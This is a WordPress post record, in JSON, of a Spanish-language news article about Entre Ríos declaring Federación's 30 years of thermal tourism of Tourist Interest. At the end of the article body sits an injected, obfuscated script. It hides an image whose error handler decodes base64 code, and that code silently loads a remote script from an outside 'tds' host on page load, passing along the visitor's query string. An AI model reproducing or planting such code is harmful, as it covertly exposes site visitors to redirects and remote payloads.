{"id":8956,"date":"2024-11-25T10:01:16","date_gmt":"2024-11-25T13:01:16","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8956"},"modified":"2025-08-13T15:35:30","modified_gmt":"2025-08-13T18:35:30","slug":"la-provincia-de-entre-rios-declaro-de-interes-turistico-la-celebracion-por-los-30-anos-de-termalismo-en-federacion","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8956","title":{"rendered":"La provincia de Entre Rios declar\u00f3 de Inter\u00e9s Tur\u00edstico la celebraci\u00f3n por los 30 a\u00f1os de termalismo en Federaci\u00f3n"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-a97badf13db60ef0892accb8d8e08c40\" style=\"background-color:#0e3929\"><em>El 24 de noviembre se conmemora el 30\u00b0 aniversario del surgimiento del agua termal en Federaci\u00f3n y la ciudad desarroll\u00f3 una serie de capacitaciones y eventos para celebrar una actividad en la que es pionera y que cambi\u00f3 la realidad tur\u00edstica de Entre R\u00edos.<\/em><\/h4>\n\n\n\n<p>Con motivo de celebrarse este 24 de noviembre los 30 a\u00f1os del termalismo en Federaci\u00f3n y en la provincia de Entre R\u00edos, la Secretar\u00eda de Turismo declar\u00f3 de Inter\u00e9s Tur\u00edstico los actos conmemorativos y festivos que se desarrollaron en la ciudad desde el viernes y hasta este domingo.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8957\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a-1024x683.jpg\" alt=\"\" class=\"wp-image-8957\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/4ab8dbd792a853908853d4ec8314473a.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8958\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82-1024x683.jpg\" alt=\"\" class=\"wp-image-8958\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/ec7bbd85461375d53dbed9e30cf06b82.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"8959\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a-1024x683.jpg\" alt=\"\" class=\"wp-image-8959\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a-1536x1024.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a-800x533.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/f6558afa9dcc62de4614a731a9ef757a.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>En los considerandos de la Resoluci\u00f3n N\u00b0 196 se valora que \u201cdesde hace 30 a\u00f1os, Federaci\u00f3n sue\u00f1a y vive los privilegios de ser la primera ciudad termal de la Mesopotamia Argentina y conserva el liderazgo a\u00f1o a a\u00f1o de un turismo que ya no tiene temporadas y que permanece actual y vigente renovando compromiso de m\u00e1s y mejores servicios para quienes en cada oportunidad visitan la ciudad\u201d.\u00a0<\/p>\n\n\n\n<p>El texto tambi\u00e9n reconoce a Federaci\u00f3n como \u201cprecursora de un fen\u00f3meno que se hizo eco en otras localidades\u201d y \u201cpionera en explotar este recurso que cambi\u00f3 radicalmente la realidad tur\u00edstica de la provincia (\u2026) y que modific\u00f3 el paradigma del termalismo en el resto del pa\u00eds, con proyecciones que actualmente repercuten en todo el Mercosur\u201d.<\/p>\n\n\n\n<p>Las celebraciones por el declarado \u201cD\u00eda del Termalismo\u201d comenzaron el viernes con una serie de jornadas de formaci\u00f3n en las que el sector tur\u00edstico, junto a expertos en la materia, analiz\u00f3 la situaci\u00f3n actual y la visi\u00f3n a futuro del termalismo en la regi\u00f3n; continuaron el s\u00e1bado con homenajes, expo de emprendedores y espect\u00e1culos art\u00edsticos; y durante el domingo se concentraron en el parque termal invitando con acceso gratuito a todos los residentes del departamento Federaci\u00f3n.&nbsp;<\/p>\n\n\n\n<p>Presente en el acto protocolar, el secretario de Turismo de Entre R\u00edos, Jorge Satto, llev\u00f3 a los federaenses el saludo del gobernador Rogelio Frigerio y el mensaje de motivaci\u00f3n \u201ca seguir adelante como lo hicieron hace 30 a\u00f1os\u201d. \u201cEste es un claro ejemplo de la resiliencia de un pueblo. Los 1268 metros que est\u00e1n perforados en este pozo termal, son 1268 pasos de fe, de esperanza, de apuesta, de perseverancia que hoy deben ser reconocidos y celebrados\u201d, expres\u00f3.<\/p>\n\n\n\n<p>En sus palabras ante los presentes, Satto consider\u00f3 que \u201cla naturaleza y Dios hicieron lo suyo, pero fue el ingenio, la perseverancia y el estudio de muchas personas los que posibilitaron que con una perforaci\u00f3n aflorara el agua y empezara a desarrollarse lo que hoy es el motivo central de la econom\u00eda y la prosperidad de esta ciudad: el movimiento termal\u201d y puntualiz\u00f3 en los beneficios que ello trajo a Federaci\u00f3n, pero tambi\u00e9n a toda la provincia. \u201cDesde el a\u00f1o 1997, cuando inaugur\u00f3 este complejo termal, todas las ciudades y departamentos quer\u00edamos tener el nuestro, y as\u00ed se fue dando. Hoy Entre R\u00edos tiene 16 parques termales a lo largo y ancho de su geograf\u00eda\u201d, grafic\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.entrerios.tur.ar\/noticia\/508\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/11\/Captura-web_8-11-2024_111525_www.entrerios.tur_.ar_-1.jpeg\" alt=\"\" class=\"wp-image-8904\" style=\"width:251px;height:auto\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El 24 de noviembre se conmemora el 30\u00b0 aniversario del surgimiento del agua termal en Federaci\u00f3n y la ciudad desarroll\u00f3 una serie de capacitaciones y eventos para celebrar una actividad en la que es pionera y que cambi\u00f3 la realidad tur\u00edstica de Entre R\u00edos. Con motivo de celebrarse este 24 de noviembre los 30 a\u00f1os [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8960,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8956","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8956","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8956"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8956\/revisions"}],"predecessor-version":[{"id":10035,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8956\/revisions\/10035"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8960"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8956"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8956"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8956"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}